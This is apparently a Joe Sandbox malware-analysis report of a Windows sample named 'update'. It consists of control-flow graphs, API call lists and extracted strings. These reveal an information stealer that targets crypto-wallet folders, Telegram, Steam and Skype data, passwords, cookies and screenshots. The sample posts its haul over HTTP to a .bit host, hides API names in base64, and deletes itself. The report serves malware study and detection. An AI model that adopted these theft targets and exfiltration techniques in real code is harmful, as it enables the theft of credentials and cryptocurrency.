4034e4 13 API calls 22208->22209 22211 405106 22209->22211 22210 4039e8 27 API calls 22210->22212 22211->19036 22212->22208 22212->22210 22214 413d10 22213->22214 22214->22214 22215 404150 SysAllocStringLen 22214->22215 22216 413d26 22215->22216 22217 403bdc SysFreeString 22216->22217 22218 413d3b 22217->22218 22219 407228 29 API calls 22218->22219 22220 413d46 22219->22220 22222 403a30 27 API calls 22220->22222 22248 413dff 22220->22248 22221 403bf4 SysFreeString 22223 413ebd 22221->22223 22227 413d77 22222->22227 22224 403508 13 API calls 22223->22224 22225 413eca 22224->22225 22226 403bf4 SysFreeString 22225->22226 22228 413ed7 22226->22228 22229 403a30 27 API calls 22227->22229 22227->22248 22230 403508 13 API calls 22228->22230 22234 413d9f 22229->22234 22231 413ee4 22230->22231 22232 403bdc SysFreeString 22231->22232 22233 413eec 22232->22233 22233->19143 22235 4036cc 27 API calls 22234->22235 22234->22248 22236 413dc1 22235->22236 22237 4074e8 27 API calls 22236->22237 22238 413dd1 22237->22238 22257 413c48 22238->22257 22240 413dfb 22241 4074e8 27 API calls 22240->22241 22240->22248 22242 413e24 22241->22242 22244 403850 27 API calls 22242->22244 22243 413de4 22243->22240 22264 413ca0 22243->22264 22246 413e42 22244->22246 22247 4074e8 27 API calls 22246->22247 22249 413e52 22247->22249 22248->22221 22250 40357c 13 API calls 22249->22250 22258 404150 SysAllocStringLen 22257->22258 22259 413c58 22258->22259 22260 413c6e GetFileAttributesW 22259->22260 22261 413c87 22260->22261 22262 403bdc SysFreeString 22261->22262 22263 413c8f 22262->22263 22263->22243 22265 404150 SysAllocStringLen 22264->22265 22266 413cb0 22265->22266 22267 413cc6 GetFileAttributesW 22266->22267 22268 413c48 3 API calls 22267->22268 22269 413cdd 22268->22269 22270 403bdc SysFreeString 22269->22270 22271 413cf8 22270->22271 22271->22240 22273 416f36 22272->22273 22274 404804 32 API calls 22273->22274 22275 416f53 22273->22275 22274->22275 22276 404810 15 API calls 22275->22276 22277 416fbe GetHGlobalFromStream GlobalLock 22276->22277 22277->19186 22278->19203 22279->19208 22281 404271 22280->22281 22282 404278 22280->22282 22281->19258 22283 402614 13 API calls 22282->22283 22284 40427f 22283->22284 22284->19258 22286 404246 22285->22286 22287 404280 15 API calls 22286->22287 22288 40425f 22286->22288 22287->22286 22288->19266 22290 403218 22289->22290 22291 4031ee 22289->22291 22290->18405 22291->22290 22299 404c1c 22291->22299 22294 403372 GetStdHandle WriteFile GetStdHandle WriteFile 22293->22294 22295 4033c9 22293->22295 22294->18404 22297 4033d2 MessageBoxA 22295->22297 22298 4033e5 22295->22298 22297->22298 22298->18404 22300 404c58 22299->22300 22301 404c35 22299->22301 22300->22291 22303 401934 22301->22303 22304 401a11 22303->22304 22305 401945 22303->22305 22304->22300 22306 401966 LocalFree 22305->22306 22307 40195c RtlEnterCriticalSection 22305->22307 22308 401999 22306->22308 22307->22306 22309 401987 VirtualFree 22308->22309 22310 4019a1 22308->22310 22309->22308 22311 4019c8 LocalFree 22310->22311 22312 4019df 22310->22312 22311->22311 22311->22312 22313 4019f5 RtlLeaveCriticalSection 22312->22313 22314 4019ff RtlDeleteCriticalSection 22312->22314 22313->22314 22314->22300 22315 40a6aa 22316 40a6b5 LoadLibraryA GetProcAddress 22315->22316 22317 40a6cf 22315->22317 22316->22317 22318 60013f 22326 601180 GetPEB 22318->22326 22321 6002a0 22328 6002ad 22321->22328 22323 600169 22324 60295b 22323->22324 22332 600443 22323->22332 22327 600145 SetErrorMode SetErrorMode 22326->22327 22327->22321 22327->22323 22330 602944 22328->22330 22329 60295b 22330->22329 22331 600443 GetPEB 22330->22331 22331->22329 22333 601180 GetPEB 22332->22333 22334 600449 22333->22334 22335 60231f 22336 602439 VirtualAllocEx 22335->22336 22337 60242d 22335->22337 22338 603279 22336->22338 22337->22336 22341 602460 GetPEB 22338->22341 22340 60327e 22342 602471 22341->22342 22342->22340 22343 60018f 22344 601180 GetPEB 22343->22344 22345 600283 22344->22345 22346 600289 VirtualAllocEx 22345->22346 22346->22346 22347 6002a0 22346->22347 22348 6002ad GetPEB 22347->22348 22349 602807 22348->22349 22350 600443 GetPEB 22349->22350 22351 60295b 22349->22351 22350->22351

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 4186e4-4186e7 1 4186ec-4186f1 0->1 1->1 2 4186f3-418784 call 403980 call 4034e4 call 40357c call 405668 call 407de0 call 406ce8 call 403798 call 403990 CreateMutexA 1->2 20 41878a-418832 call 40357c call 416df4 call 4069a8 call 40357c call 406ce8 call 406834 call 4037dc call 416df4 call 417da4 call 416df4 call 403790 2->20 21 41967c-41987d call 4034e4 call 403bf4 call 4034e4 call 403bf4 call 403508 call 403bdc call 403508 call 403bdc call 403508 call 403bdc call 403508 call 403bdc call 403508 call 403bdc call 403508 call 403bdc call 403508 call 403bdc call 403508 call 403bdc call 403508 call 403bf4 call 4034e4 call 403bf4 call 4034e4 call 403bf4 call 4034e4 call 403bf4 call 4034e4 call 403bf4 call 403508 call 4034e4 call 404280 call 403508 call 4034e4 call 403508 * 2 2->21 20->21 66 418838-418845 call 4038dc 20->66 66->21 73 41884b-4188fa call 4074e8 call 4069a8 call 4074e8 call 406b08 call 407a18 call 4074e8 call 4069a8 call 408180 call 409668 call 40e630 call 404648 66->73 118 418900-418901 73->118 119 418fd5-419363 call 4169ac call 403850 call 40e6d4 call 406ce8 call 406834 call 407b08 call 406834 call 406bd8 call 40377c call 406834 call 4066e4 call 40377c call 406834 call 406634 call 40377c call 406834 call 4065f0 call 40377c call 406834 call 40709c call 40377c call 406834 call 40709c call 40377c call 406834 call 40709c call 40377c call 406834 call 40709c call 40377c call 406834 * 2 call 407de0 call 406834 call 403850 call 4063c8 call 406560 call 40e8d0 call 403850 73->119 121 418903-418911 call 403790 118->121 405 419365-4193a2 call 403850 119->405 406 4193a7-4193ed call 416df4 call 417da4 call 405114 call 403790 119->406 130 418917-418919 121->130 131 418fcd-418fcf 121->131 135 41891f-418929 130->135 136 418b5e-418b67 130->136 131->119 131->121 141 41894b-418955 135->141 142 41892b-418946 call 40e1dc call 405424 call 40e6d4 135->142 139 418ef1-418efa 136->139 140 418b6d-418b9c call 407a18 call 40357c call 403ad4 136->140 146 418f17-418f20 139->146 147 418efc-418f12 call 403850 139->147 201 418ba2-418bcf call 4074e8 140->201 202 418e0e-418eec call 403d88 * 2 call 407108 call 4038dc * 2 call 403850 call 403d88 * 2 call 4037dc call 403d88 call 413f58 140->202 149 418957-418975 call 413bb4 call 405574 call 40e6d4 141->149 150 41897a-418984 141->150 142->141 146->131 159 418f26-418f49 call 407a18 call 4038dc 146->159 147->146 149->150 157 418986 call 413be8 150->157 158 41898b-418995 150->158 157->158 166 418ab8-418ac2 158->166 167 41899b-418a43 call 414de8 call 413f58 * 4 158->167 206 418f4b-418fbb call 417da4 call 4074e8 * 2 call 403850 call 40e6d4 159->206 207 418fbd-418fc8 call 40e6d4 159->207 170 418ac4-418ac9 call 414808 166->170 171 418ace-418ad8 166->171 248 418a45-418a4a 167->248 249 418a4c-418a6f call 413f58 167->249 170->171 182 418afb-418b05 171->182 183 418ada-418af6 call 413f58 171->183 192 418b11-418b1b 182->192 193 418b07-418b0c call 414a90 182->193 183->182 203 418b1d-418b49 GetSystemMetrics * 2 call 416fd0 call 40e6d4 192->203 204 418b4e-418b58 192->204 193->192 201->21 241 418bd5-418bdb 201->241 202->139 203->204 204->136 216 418b5a 204->216 206->131 207->131 216->136 247 418e00-418e03 241->247 253 418be0-418c16 call 40709c call 40377c call 403ad4 247->253 254 418e09 247->254 248->249 270 418a71-418a76 249->270 271 418a78-418a9b call 413f58 249->271 297 418dfd 253->297 298 418c1c-418df8 call 403cf4 call 403850 call 403d88 * 2 call 40717c call 40377c call 4034e4 call 403850 call 403d88 call 40717c call 403db4 call 40377c call 403d88 call 4078d8 call 40377c call 403d88 * 2 call 407108 call 4038dc * 2 call 4037dc call 403d88 * 2 call 4037dc call 403d88 call 413f58 253->298 254->139 270->271 287 418aa4-418aac 271->287 288 418a9d-418aa2 271->288 287->166 292 418aae-418ab3 call 405114 287->292 288->287 292->166 297->247 298->297 405->406 418 4193f3-419410 call 407a18 call 404648 406->418 419 4194fd call 4099c0 406->419 418->419 428 419416-419417 418->428 423 419502-41951d call 407de0 call 4038dc 419->423 432 419538-419545 call 4038dc 423->432 433 41951f-41952c call 4038dc 423->433 430 419419-41944f call 404804 call 407a18 call 404648 428->430 450 4194f5-4194f7 430->450 451 419455-419464 call 4038dc 430->451 432->21 443 41954b-41954f 432->443 433->432 442 41952e-419533 call 407e90 433->442 442->21 443->21 446 419555-419677 call 4028e0 call 4062fc call 403d98 call 4062fc call 402754 call 403d88 call 4077c8 call 403e78 call 403d98 call 402754 call 403d88 call 407854 call 403d98 ExitProcess 443->446 450->419 450->430 451->450 457 41946a-41948e call 407a18 call 404648 451->457 468 4194d1-4194d5 457->468 469 419490-419491 457->469 468->450 470 4194d7-4194f0 call 4038dc call 41843c 468->470 472 419498-4194c9 call 40633c call 403ad4 469->472 470->450 472->468 484 4194cb-4194cf 472->484 484->468 484->472
                                                                                                            APIs
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00418771
                                                                                                              • Part of subcall function 00409668: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?), ref: 004096BF
                                                                                                              • Part of subcall function 00409668: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6), ref: 0040970D
                                                                                                              • Part of subcall function 00409668: SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?,?,00000000), ref: 00409741
                                                                                                              • Part of subcall function 00409668: LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?,?), ref: 00409762
                                                                                                              • Part of subcall function 00409668: GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
                                                                                                              • Part of subcall function 00409668: GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 00418B2C
                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 00418B34
                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 00419677
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectory$AddressMetricsProcSystem$CurrentExitLibraryLoadMutexProcess
                                                                                                            • String ID: "countryCode":"$"query":"$%APPDATA%\Ethereum\keystore\$%APPDATA%\Exodus\$%APPDATA%\Jaxx\Local Storage\$%APPDATA%\MultiBitHD\$%DSK_$%appdata%\Electrum-LTC\wallets\$%appdata%\Electrum\wallets\$%appdata%\Telegram Desktop\tdata\$%comspec%$*.json,*.seco$++++$/c %WINDIR%\system32\timeout.exe 3 & del "$<$</c>$</coks$</d>$</file$</info$</ip$</n>$</pwds$<c>$<coks$<d>$<file$<info$<ip$<n>$<pwds$Coins$Coins\Electrum$Coins\Electrum-LTC$Coins\Ethereum$Coins\Exodus$Coins\Jaxx\Local Storage\$Coins\MultiBitHD$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$T_@$Telegram$UTC*$exit$http://ip-api.com/json$image/jpeg$ip.txt$mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml$scr.jpg
                                                                                                            • API String ID: 1296064569-3281574059
                                                                                                            • Opcode ID: dd4a759874b448f673d2a4fd46c1203918a6d0ae002507f4010e9563ca01a716
                                                                                                            • Instruction ID: 3797f177b1bbe09be7fd524c5594b962f7777058f818ea16023579e3bd1f6f93
                                                                                                            • Opcode Fuzzy Hash: dd4a759874b448f673d2a4fd46c1203918a6d0ae002507f4010e9563ca01a716
                                                                                                            • Instruction Fuzzy Hash: 43A20A34A002199BDB10EB55CC91BDDB7B5EF49304F5080BBF408BB291DB78AE868F59

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 0041724F
                                                                                                            • GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417255
                                                                                                            • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417269
                                                                                                            • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 0041726F
                                                                                                            • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417283
                                                                                                            • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417289
                                                                                                            • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 0041729D
                                                                                                            • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172A3
                                                                                                            • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 004172B7
                                                                                                            • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172BD
                                                                                                            • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 004172D1
                                                                                                            • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172D7
                                                                                                            • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 004172EB
                                                                                                            • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172F1
                                                                                                            • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 00417305
                                                                                                            • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 0041730B
                                                                                                            • LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 0041731F
                                                                                                            • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417325
                                                                                                            • LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417339
                                                                                                            • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 0041733F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
                                                                                                            • API String ID: 2574300362-2815069134
                                                                                                            • Opcode ID: 1b50f59bb49dcc1b6f823cd8cbb9f8804222f8caf113522e52f3969ecb9f36f5
                                                                                                            • Instruction ID: a98f21beb08f5e7a8693b8482d73447dd3fc81d530b02daa868018d23397fb24
                                                                                                            • Opcode Fuzzy Hash: 1b50f59bb49dcc1b6f823cd8cbb9f8804222f8caf113522e52f3969ecb9f36f5
                                                                                                            • Instruction Fuzzy Hash: 2011FEF06D8304B9C60077F2FC47A9A2A797685709321453BBE10F20E2C57C6881979D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 500 417da4-417da8 501 417dad-417db2 500->501 501->501 502 417db4-417df3 call 403980 * 3 501->502 509 417e02-417e38 call 4034e4 call 40357c * 2 call 4039e8 GetModuleHandleA 502->509 510 417df5-417dfd call 40357c 502->510 520 417e4a-41802f call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 404f5c * 7 call 403790 call 403990 InternetCrackUrlA call 4036dc call 403790 call 4039f0 call 403ad4 509->520 521 417e3a-417e48 call 4039e8 LoadLibraryA 509->521 510->509 568 418031-41806f call 4036dc call 4037dc call 417688 call 403990 520->568 569 418072-418086 InternetOpenA 520->569 521->520 568->569 570 4181d7-4181de 569->570 571 41808c-4180c9 InternetConnectA 569->571 577 4181e0-41821e call 4036dc * 2 call 417840 570->577 578 418223-418230 call 4038dc 570->578 587 4181d1-4181d4 571->587 588 4180cf-4180f6 call 4036dc call 403ad4 571->588 577->578 591 418232-418250 call 40627c call 4038dc 578->591 592 41825a-4182b1 call 403538 call 4034e4 call 403508 * 4 578->592 587->570 606 4180f8 588->606 607 4180ff-418126 call 403990 HttpOpenRequestA 588->607 591->592 612 418252-418255 call 4034e4 591->612 606->607 617 4181cb-4181cf InternetCloseHandle 607->617 618 41812c-418130 607->618 612->592 617->587 620 418150-418172 call 403790 call 403990 HttpSendRequestA 618->620 621 418132-41814c call 403790 call 403990 618->621 620->617 634 418174-4181aa call 404f5c InternetReadFile call 4035d4 620->634 621->620 639 4181af-4181c3 call 403798 634->639 639->617 642 4181c5-4181c9 639->642 642->617 642->634
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,004182B2,?,?,?,?,00000000,00000000,00000000,?,00418815,00000000), ref: 00417E2F
                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,004182B2,?,?,?,?,00000000,00000000,00000000,?,00418815,00000000), ref: 00417E43
                                                                                                            • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 00417E57
                                                                                                            • GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00417E6C
                                                                                                            • GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00417E81
                                                                                                            • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00417E96
                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000053), ref: 00417EAB
                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000064), ref: 00417EC0
                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000075), ref: 00417ED5
                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000089), ref: 00417EEB
                                                                                                            • GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00417F02
                                                                                                            • InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 00417FEE
                                                                                                            • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000,?,00418815,00000000), ref: 0041807F
                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,00000000,00000000,00000000), ref: 004180BF
                                                                                                            • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,?,?,00000000,00000000,00000000), ref: 0041811C
                                                                                                            • HttpSendRequestA.WININET(00000000,004183EC,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00418815,00000000), ref: 0041816D
                                                                                                            • InternetReadFile.WININET(00000000,?,00010064,?,?,?,?,?,00000000,00000000,00000000,?,00418815,00000000), ref: 00418198
                                                                                                            • InternetCloseHandle.WININET(00000000,?,?,?,?,00000000,00000000,00000000,?,00418815,00000000), ref: 004181CF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Internet$HandleHttpOpenRequest$CloseConnectCrackFileLibraryLoadModuleReadSend
                                                                                                            • String ID: .bit$C9896252$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$wininet.dll
                                                                                                            • API String ID: 2047011702-652187286
                                                                                                            • Opcode ID: 62ba9a3a62b01f8bc841a524288261099d10986cac07bda2f365372dd205522c
                                                                                                            • Instruction ID: 801840e1656a921475aa8d836ade25f441fe318e6b6fe0a913a22531e032b4b7
                                                                                                            • Opcode Fuzzy Hash: 62ba9a3a62b01f8bc841a524288261099d10986cac07bda2f365372dd205522c
                                                                                                            • Instruction Fuzzy Hash: 26E1FEB1910208ABDB10EFA5CC46BDEBBBCBF48305F10457AF504B7691DB78AA45CB58

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,,?,?,), ref: 00416320
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416326
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,), ref: 0041634E
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416354
                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE), ref: 00416393
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416399
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001), ref: 004163AC
                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 004163CB
                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0041643A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00416448
                                                                                                            • GetCurrentProcessId.KERNEL32(?,-00000001,?,?,?,00416BCE,?,00000001,,?,?,,?,Zone: ,?,00416CC4), ref: 004164C6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc$Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
                                                                                                            • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll$`A
                                                                                                            • API String ID: 1927487376-3005690938
                                                                                                            • Opcode ID: 153c94e531e4f0db284edc14d15d82e136f5b961d9b809ca98405f4227d7910d
                                                                                                            • Instruction ID: 67278170e91c31cc6e542a24f092c99a4e60002f621039dc7dfe152e0641e341
                                                                                                            • Opcode Fuzzy Hash: 153c94e531e4f0db284edc14d15d82e136f5b961d9b809ca98405f4227d7910d
                                                                                                            • Instruction Fuzzy Hash: 679184709001199BCB10EF99C985ADEB7B9FF84304F2181BAE509B7291D739EF858F58
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,00409B45,?,?,?,?,00419502), ref: 00409A0B
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,00409B45,?,?,?,?,00419502), ref: 00409A3A
                                                                                                            • FindNextFileW.KERNELBASE(00000000,?,?,?,?,?,00419502), ref: 00409ADA
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,00419502), ref: 00409AEC
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,?,00419502), ref: 00409B11
                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,00419502), ref: 00409B25
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$DirectoryFile$CloseCurrentFirstFreeLibraryNextRemove
                                                                                                            • String ID: %TEMP%\
                                                                                                            • API String ID: 3686138682-2282305525
                                                                                                            • Opcode ID: 66c05e9bfec5bc6f7d622e76609e2dd9a837fe982c02bf5270c9ee424d2a5a61
                                                                                                            • Instruction ID: dc35ce041a643583f5f8d8bd1e87a628f97aff475ff8516c22ff3c130ece2fe8
                                                                                                            • Opcode Fuzzy Hash: 66c05e9bfec5bc6f7d622e76609e2dd9a837fe982c02bf5270c9ee424d2a5a61
                                                                                                            • Instruction Fuzzy Hash: 204110746006199FC750EF69DC85A8AB7F9EF89305F0081B6A408F33A1DB74AE45CF58
                                                                                                            APIs
                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,0041688C,?,-00000001,?,?,?,00416B8B,Zone: ,?,00416CC4,?,LocalTime: ,?,00416CC4), ref: 004167F2
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeInformationStringTimeZone
                                                                                                            • String ID: UTC+
                                                                                                            • API String ID: 3683333525-3251258214
                                                                                                            • Opcode ID: f41ff27d4f8f960fa14a3eacf56d40a338feca14225810b151d6a7f6519b6b57
                                                                                                            • Instruction ID: 5ec20ea157f6df9457f2aaa48a67f1a88062805be60e3b9a11f1e748eb71f9a8
                                                                                                            • Opcode Fuzzy Hash: f41ff27d4f8f960fa14a3eacf56d40a338feca14225810b151d6a7f6519b6b57
                                                                                                            • Instruction Fuzzy Hash: EE118470B047149FE755DB6ACC41B96B6FEEB8C300F1181B5B50CE3391D7349E458A5A
                                                                                                            APIs
